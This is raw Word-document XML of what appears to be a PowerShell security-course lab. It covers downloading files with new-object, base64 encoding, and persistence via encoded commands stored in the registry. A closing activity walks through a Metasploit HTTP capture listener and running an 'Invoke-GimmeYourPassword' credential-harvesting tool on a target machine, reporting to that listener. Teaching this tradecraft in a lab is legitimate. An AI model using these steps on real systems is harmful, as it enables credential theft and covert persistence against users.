        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t>Which namespace and class can be used to *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>downloadfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidR="00FC1AE3">
        <w:t>&lt;---- hint that was intentional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694A9521" w14:textId="77777777" w:rsidR="00FC1AE3" w:rsidRDefault="00F256E3" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a variable for this class. You will have to use a cmdlet we have not and will not discuss in class. your variable will be equal to = new-object &lt;answer from the previous step&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B7BCE" w14:textId="77777777" w:rsidR="00FC1AE3" w:rsidRDefault="00F256E3" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t>Use get-member to see the methods available to this variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C924FA" w14:textId="34E953D2" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t>To download a file the command will be $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>var.downloadfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">&gt;,&lt;full path of destination) . In my experience if I do not use the full path this file will not save. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364D022A" w14:textId="1840584C" w:rsidR="00FC1AE3" w:rsidRPr="00FC1AE3" w:rsidRDefault="00FC1AE3" w:rsidP="00FC1A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w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1AE3">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Convert "this is secret and should be hidden" to base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490ED91A" w14:textId="3E35D0EA" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Which namespace does the encoding class fall under? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AB891E" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once determined your answer should look like this: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B83977" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t>[&lt;answer&gt;.&lt;here&gt;.encoding]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ascii.getbytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('this is secret and should be hidden')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A813D7B" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t>OR [&lt;here&gt;.encoding]:::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ascii.getbytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('this is secret and should be hidden') *We'll explain the difference later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B207AD0" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pipe this first to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, then save it at a variable of your choice. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08146352" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t>Find the class that contains the ToBase64string property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132E788" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t>[Answer]::ToBase64String(&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>varaiblename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5FDE75" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00F256E3"/>
    <w:p w14:paraId="4EE6117C" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRPr="00082B5F" w:rsidRDefault="00F256E3" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Cambria"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Cambria"/>
          <w:b/>
        </w:rPr>
        <w:t>Practice @Home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A2B51D" w14:textId="72E33043" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00F256E3">
      <w:r>
        <w:t xml:space="preserve">A form of </w:t>
      </w:r>
      <w:r w:rsidR="00947E09">
        <w:t>persistence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is to save base64 encoded text into a registry value. The command would look something like: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD088A2" w14:textId="7E0B10E4" w:rsidR="00F256E3" w:rsidRPr="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F256E3">
        <w:t>powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F256E3">
        <w:t>encodedcommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F256E3">
        <w:t xml:space="preserve"> &lt;registry value decoded&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54737C" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRDefault="00EB5B0F" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B76F37" w14:textId="0C419AAF" w:rsidR="00FC1AE3" w:rsidRDefault="00CA4184" w:rsidP="00FC1A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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00FC1AE3">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">  @</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FC1AE3">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223246EE" w14:textId="77777777" w:rsidR="00FC1AE3" w:rsidRDefault="00FC1AE3" w:rsidP="00FC1AE3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD7E9E8" w14:textId="77777777" w:rsidR="00FC1AE3" w:rsidRDefault="00FC1AE3" w:rsidP="00FC1AE3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Tahoma"/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE950BB" w14:textId="6A57F1EA" w:rsidR="00FC1AE3" w:rsidRDefault="00FC1AE3" w:rsidP="00FC1AE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Garamond"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Garamond"/>
        </w:rPr>
        <w:t>Now that you know some basics on PowerShell time to run “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Garamond"/>
        </w:rPr>
        <w:t>Gimmie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Garamond"/>
        </w:rPr>
        <w:t>” on your own. These steps will walk you through running it.</w:t>
      </w:r>
      <w:r w:rsidR="00FC3E6A">
        <w:rPr>
          <w:rFonts w:eastAsia="Garamond"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enjoy. Improve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CAC822" w14:textId="77777777" w:rsidR="00FC1AE3" w:rsidRDefault="00FC1AE3" w:rsidP="00FC1AE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Tahoma"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6CB503" w14:textId="77777777" w:rsidR="00FC1AE3" w:rsidRDefault="00FC1AE3" w:rsidP="00FC1AE3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Tahoma"/>
        </w:rPr>
        <w:t>Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B692D2D" w14:textId="77777777" w:rsidR="00FC1AE3" w:rsidRDefault="00FC1AE3" w:rsidP="00FC1AE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF6DF34" w14:textId="71BC3549" w:rsidR="00FC1AE3" w:rsidRPr="00622089" w:rsidRDefault="00FC1AE3" w:rsidP="00FC1A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Gimmie”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4268AA7A" w14:textId="70796CBE" w:rsidR="00CA4184" w:rsidRDefault="00CA4184" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener on a machine of your choice. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for this listener is: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303DB843" w14:textId="77777777" w:rsidR="00694394" w:rsidRPr="00457911" w:rsidRDefault="00694394" w:rsidP="00694394">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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use auxiliary/server/capture/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457911">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>http_basic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4AD2A9D2" w14:textId="77777777" w:rsidR="00694394" w:rsidRPr="00457911" w:rsidRDefault="00694394" w:rsidP="00694394">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457911">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>RedirectURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00457911">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> www.google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC9C212" w14:textId="77777777" w:rsidR="00694394" w:rsidRPr="00457911" w:rsidRDefault="00694394" w:rsidP="00694394">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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 xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457911">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>srvport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00457911">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26EBC7" w14:textId="77777777" w:rsidR="00694394" w:rsidRPr="00457911" w:rsidRDefault="00694394" w:rsidP="00694394">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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 xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00457911">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00457911">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> false </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093016D3" w14:textId="77777777" w:rsidR="00694394" w:rsidRPr="00457911" w:rsidRDefault="00694394" w:rsidP="00694394">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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set URIPATH /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5620536A" w14:textId="15056A45" w:rsidR="00CA4184" w:rsidRDefault="00CA4184" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t>Put a copy of Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gimmeyourpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> onto your target machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312D007F" w14:textId="3E6556F6" w:rsidR="00CA4184" w:rsidRDefault="00CA4184" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t>Import-module invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gimmeyourpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2678CCB3" w14:textId="028C5417" w:rsidR="00CA4184" w:rsidRDefault="00CA4184" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At this time, the script is written to look in one of two places. I have an if statement that will look for a particular key that I use for demos. If that key is present, the folder in which the tool will look for has been hardcoded. Creating the demo key will be the easiest way to run this. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0351AA3A" w14:textId="405AEDD1" w:rsidR="00CA4184" w:rsidRDefault="00CA4184" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you choose not to use the demo key, the tool will look at the most recently used registry value for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and will set the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wmisubscriber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to listen here. If you want to see what that path is currently set too, use the function search-keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC1336" w14:textId="77CF4D91" w:rsidR="00CA4184" w:rsidRDefault="00CA4184" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t>If bullet five was to</w:t>
      </w:r>
      <w:r w:rsidR="002F7DE4">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> long, use search-keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2DC239" w14:textId="77777777" w:rsidR="00CA4184" w:rsidRDefault="00CA4184" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t>Once the path is set, run the following function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF69B7A" w14:textId="2580F3D4" w:rsidR="00FC1AE3" w:rsidRPr="00CA4184" w:rsidRDefault="00CA4184" w:rsidP="00CA4184">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GimmeYourPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -URL &lt;IP of listener set in step 1&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC1AE3" w:rsidRPr="00CA4184" w:rsidSect="00BD442A">
      <w:pgSz w:w="11899" w:h="15499"/>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0359" w14:textId="77777777" w:rsidR="00211F49" w:rsidRDefault="00211F49" w:rsidP="00F256E3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="563EDB82" w14:textId="77777777" w:rsidR="00211F49" w:rsidRDefault="00211F49" w:rsidP="00F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03C5" w14:textId="77777777" w:rsidR="00211F49" w:rsidRDefault="00211F49" w:rsidP="00F256E3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="51EDE84D" w14:textId="77777777" w:rsidR="00211F49" w:rsidRDefault="00211F49" w:rsidP="00F25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D80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819F6"/>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3A1679F"/>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D90E63"/>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A684A"/>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8E0058"/>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D3540"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DD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42FF"/>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5B706B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A384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C727A"/>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B927E3"/>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F167F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD6820D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49B85C2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C7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06D7A"/>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6D52B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59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4198D"/>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B049BE"/>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B06647"/>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5E7923C9"/>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1608E4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7C25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576D6"/>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6B0EB7"/>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E9515C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9AE4A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61655F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B5A28342"/>
    <w:lvl w:ilvl="0" w:tplc="6F547E7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24A9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E01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B330D"/>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ECE0706"/>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FA788C"/>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1"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="2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5"/>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0"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="6"/>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4"/>
    <w:rsid w:val="00001D77"/>
    <w:rsid w:val="00017473"/>
    <w:rsid w:val="00020640"/>
    <w:rsid w:val="00023A38"/>
    <w:rsid w:val="00025547"/>
    <w:rsid w:val="0003746C"/>
    <w:rsid w:val="00037DAC"/>
    <w:rsid w:val="00047BF5"/>
    <w:rsid w:val="000523EB"/>
    <w:rsid w:val="0006601A"/>
    <w:rsid w:val="00067D3C"/>
    <w:rsid w:val="00074E1F"/>
    <w:rsid w:val="00082B5F"/>
    <w:rsid w:val="000B2650"/>
    <w:rsid w:val="000B6107"/>
    <w:rsid w:val="000C5050"/>
    <w:rsid w:val="001102B9"/>
    <w:rsid w:val="0014005A"/>
    <w:rsid w:val="00150C05"/>
    <w:rsid w:val="00162538"/>
    <w:rsid w:val="00176BD8"/>
    <w:rsid w:val="00193DE9"/>
    <w:rsid w:val="00195792"/>
    <w:rsid w:val="001B3B54"/>
    <w:rsid w:val="001C09E6"/>
    <w:rsid w:val="001E5C06"/>
    <w:rsid w:val="001F0AEB"/>
    <w:rsid w:val="001F1CB0"/>
    <w:rsid w:val="00211F49"/>
    <w:rsid w:val="00213DC6"/>
    <w:rsid w:val="0023302B"/>
    <w:rsid w:val="00246825"/>
    <w:rsid w:val="002530EA"/>
    <w:rsid w:val="00275AF0"/>
    <w:rsid w:val="002944E8"/>
    <w:rsid w:val="002A73BA"/>
    <w:rsid w:val="002B7613"/>
    <w:rsid w:val="002B7D9D"/>
    <w:rsid w:val="002C6D5B"/>
    <w:rsid w:val="002F65CA"/>
    <w:rsid w:val="002F7DAD"/>
    <w:rsid w:val="002F7DE4"/>
    <w:rsid w:val="00301ED8"/>
    <w:rsid w:val="00302066"/>
    <w:rsid w:val="003136C6"/>
    <w:rsid w:val="00316B31"/>
    <w:rsid w:val="003402C7"/>
    <w:rsid w:val="00345D55"/>
    <w:rsid w:val="00350D3E"/>
    <w:rsid w:val="00355438"/>
    <w:rsid w:val="0036022B"/>
    <w:rsid w:val="003822A6"/>
    <w:rsid w:val="003A0131"/>
    <w:rsid w:val="003A12DF"/>
    <w:rsid w:val="003A79D8"/>
    <w:rsid w:val="003B1BA4"/>
    <w:rsid w:val="003C407F"/>
    <w:rsid w:val="003F3201"/>
    <w:rsid w:val="003F32DA"/>
    <w:rsid w:val="003F35E9"/>
    <w:rsid w:val="0040305A"/>
    <w:rsid w:val="00407363"/>
    <w:rsid w:val="004076C2"/>
    <w:rsid w:val="00407DD7"/>
    <w:rsid w:val="00442826"/>
    <w:rsid w:val="00452076"/>
    <w:rsid w:val="00453A5B"/>
    <w:rsid w:val="00455B3B"/>
    <w:rsid w:val="00474309"/>
    <w:rsid w:val="0049103E"/>
    <w:rsid w:val="00493D35"/>
    <w:rsid w:val="00497089"/>
    <w:rsid w:val="004A3DAD"/>
    <w:rsid w:val="004A585A"/>
    <w:rsid w:val="004C7169"/>
    <w:rsid w:val="004D0096"/>
    <w:rsid w:val="004F30BC"/>
